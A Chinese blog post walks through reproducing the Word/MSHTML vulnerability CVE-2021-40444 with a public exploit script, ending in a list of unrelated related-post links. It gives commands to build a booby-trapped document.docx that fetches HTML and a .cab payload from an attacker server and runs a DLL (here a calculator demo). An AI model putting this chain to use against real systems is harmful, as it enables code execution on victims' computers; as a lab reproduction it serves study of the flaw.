本文的標(biāo)題是《2021年的word文檔還有漏洞,Office 1day CVE-2021-40444復(fù)現(xiàn)》來源于:由作者:陳鵬羽采編而成,主要講述了項(xiàng)目地址在https://github.com/lo
項(xiàng)目地址在https://github.com/lockedbyte/CVE-2021-40444。先下載到kali里。
由于此項(xiàng)目必須使用lcab,所以我們先在kail里安裝一下。
wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make
sudo make install
which lcab
# 查看幫助信息
lcab –help
進(jìn)入下載后的CVE-2021-40444目錄里,執(zhí)行:
python3 exploit.py generate test/calc.dll http://<SRV IP>:3333
看見“You can execute now the server and then send document.docx to target” 說明就可以了。
然后用python開一個(gè)http服務(wù),端口用剛剛設(shè)置的3333 或者自己設(shè)置的端口號(hào)。
sudo python3 exploit.py host 3333
把CVE-2021-40444目錄里的子目錄out下的document.docx文件copy到虛擬機(jī)中執(zhí)行。
word打開后,可以看見這里在下載我們kali上的html文件。
html又會(huì)下載calc.cab 文件執(zhí)行其中的命令,最后彈出計(jì)算器。
服務(wù)端顯示的結(jié)果:
現(xiàn).jpg "2021年的word文檔還有漏洞,Office 1day CVE-2021-40444復(fù)現(xiàn)(2021年的微博之夜的king和queen是誰)插圖18")
本文原作者為陳鵬羽,轉(zhuǎn)載請(qǐng)注明:出處!如該文有不妥之處,請(qǐng)聯(lián)系站長(zhǎng)刪除,謝謝合作~
原創(chuàng)文章,作者:陳鵬羽,如若轉(zhuǎn)載,請(qǐng)注明出處:http://www.uuuxu.com/20220512315602.html
相關(guān)推薦
-
how to get 3ds max for free
3d**ax免費(fèi)獲取的方法 如果你想要免費(fèi)獲取3d**ax,有幾種方法可以嘗試。Autodesk官方網(wǎng)站提供了30天的免費(fèi)試用期,在這個(gè)時(shí)間段內(nèi)你可以使用所有功能并且不限制導(dǎo)出文件…
-
為什么學(xué)不好PS?2萬設(shè)計(jì)師親測(cè),小白專屬200集系統(tǒng)PS教程(為什么學(xué)不好語文)
本文的標(biāo)題是《為什么學(xué)不好PS?2萬設(shè)計(jì)師親測(cè),小白專屬200集系統(tǒng)PS教程》來源于:由作者:陳思寧采編而成,主要講述了
小編了解過很多自學(xué)PS的同學(xué)遇到的問題
?大多都是自己在網(wǎng)站上隨便找來下載的教 -
如何在Word 2013文檔中創(chuàng)建自定義段落樣式
在Word 2013中,一段文字的格式設(shè)置包括多個(gè)方面,如字
-
黑暗微信頭像(黑暗微信頭像女生)
前沿拓展: 黑暗微信頭像 你的女朋友分手后,把所有的微信頭像朋友圈照片換成純黑色圖片,是因?yàn)橛X得生無可戀了,非常痛苦的感覺。 暗黑系頭像最近很火,幫你們精心整理了一批無水印頭像 拓…
-
微信好友恢復(fù)助手靠譜嗎(微信恢復(fù)助手是真的嗎)
前沿拓展: 微信好友恢復(fù)助手靠譜嗎 1,事先說明一下,數(shù)據(jù)恢復(fù)軟件不是**的,數(shù)據(jù)恢復(fù)的比例在0%到100%之間均有可能,并且重復(fù)恢復(fù)后,可恢復(fù)的內(nèi)容不會(huì)有任何變化。這里以蘋果手機(jī)…
-
Word中圖片上添加文字的三種簡(jiǎn)易方法(word中圖片上面怎么寫字)
很多初學(xué)Word辦公軟件的朋友有時(shí)候會(huì)問,如何在Word里面
-
辦公必備的WPS Office 2021 for mac(wps 2021中文版)(辦公必備的軟件有哪些)
本文的標(biāo)題是《辦公必備的WPS Office 2021 for mac(wps 2021中文版)》來源于:由作者:陳俊希采編而成,主要講述了wps office 2021 mac中文版是由金山公司發(fā)行
-
微信好友恢復(fù)助手免費(fèi)版(微信恢復(fù)助手官方下載)
前沿拓展: 微信好友恢復(fù)助手免費(fèi)版 方法一:打開你的手機(jī)微信,進(jìn)入主頁面,點(diǎn)擊右上方的“+”號(hào),選擇“添加朋友”,在搜索礦中輸入對(duì)方的手機(jī)號(hào)、微信號(hào)或是QQ號(hào),重新加回來即可。 方…
-
中年媽媽微信頭像(中年媽媽微信頭像圖片)
前沿拓展: 中年媽媽微信頭像 帶姓氏的微信頭像圖片制作如下: 工具:華為手機(jī)、微信APP。 1、打開微信APP,在頂部搜索框,搜索姓氏圖。 2、搜索到姓氏圖,點(diǎn)擊進(jìn)入姓氏圖小程序。…
-
心情不好的句子發(fā)朋友圈(心情不好的句子發(fā)朋友圈免費(fèi))
前沿拓展: 心情不好的句子發(fā)朋友圈 1、人生是一段孤獨(dú)的旅程,也許半路上就有了曾經(jīng)擁有的人,但終究會(huì)分開。2、不是每一次的努力都會(huì)有收獲,但每一次的收獲都必須努力,這是一個(gè)不公平的…